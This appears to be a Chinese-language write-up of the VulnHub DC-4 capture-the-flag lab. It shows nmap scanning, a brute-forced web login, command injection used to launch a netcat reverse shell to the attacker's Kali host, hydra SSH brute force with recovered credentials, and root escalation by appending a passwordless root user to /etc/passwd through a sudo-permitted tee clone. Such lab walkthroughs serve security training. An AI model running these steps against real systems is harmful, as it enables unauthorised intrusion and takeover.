下载链接:https://www.vulnhub.com/entry/dc-4,313/
还是先用netdiscover 探测靶机,排除.1,.2可以确认靶机IP为192.168.184.142
命令:netdiscover -r 192.168.184.142
开始用nmap探测端口,不过只开了22和80
命令:nmap -A -sS -sV -v -p- 192.168.184.142
访问80端口以后发现是个登录框页面,看来只能爆破了,尝试过SQL注入卒
开始抓包放到intruder里面跑(需要自备字典)最后跑到admin happy成功跑出来
登录成功以后页面是这样的:
点了list files以后就跟ls效果一样会列出当前的目录
那么换成whoami也可以执行成功列出当前用户为www-data石锤当前存在命令执行漏洞
这样的话我们可以启用netcat创建一个反弹shell由于刚才抓包知道ls -l 是会变成ls+-l
原语句:nc -nv 192.168.184.133(kali IP) 2000 -e /bin/bash
变成 nc+-nv+192.168.184.133+2000+-e+/bin/bash
记得先提前开启kali端口
这里不断浏览在/home/jim/backups/里面发现一堆密码信息
把这些密码信息复制保存下来,开始进行22端口爆破最后得到用户密码是jim jibril04
命令: hydra -l jim -P ./mima ssh://192.168.184.142
成功登陆以后继续挖掘信息,这次来到/var/mail目录下有封给charles的信顺便提供了密码
再次登录成功
先sudo -l一波,发现可以以root权限运行/usr/bin/teehee同时查看了一下它的作用是将标准输入复制到每个FILE,也复制到标准输出。(谷歌翻译提供)其中 -a是一个附加文件,我们可以加上/etc/passwd然后创建一个新用户空密码的root权限
添加一个新用户为pikapi设置密码为空,在附上刚才要指定的文件可以构造一条语句,最后顺利拿到flag
格式为 [用户名]:[密码]:[uid]:[gid]
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
奖励系统 | 100.00 | 0 | 2020-08-10 09:09:32 | 投稿满 10 赞奖励 |
奖励系统 | 50.00 | 0 | 2020-08-09 10:10:38 | 投稿满 5 赞奖励 |
Track-聂风 | 60.00 | 0 | 2020-07-14 15:03:26 | 支持同学,期待你的新文章 |
打赏我,让我更有动力~
© 2016 - 2023 掌控者 All Rights Reserved.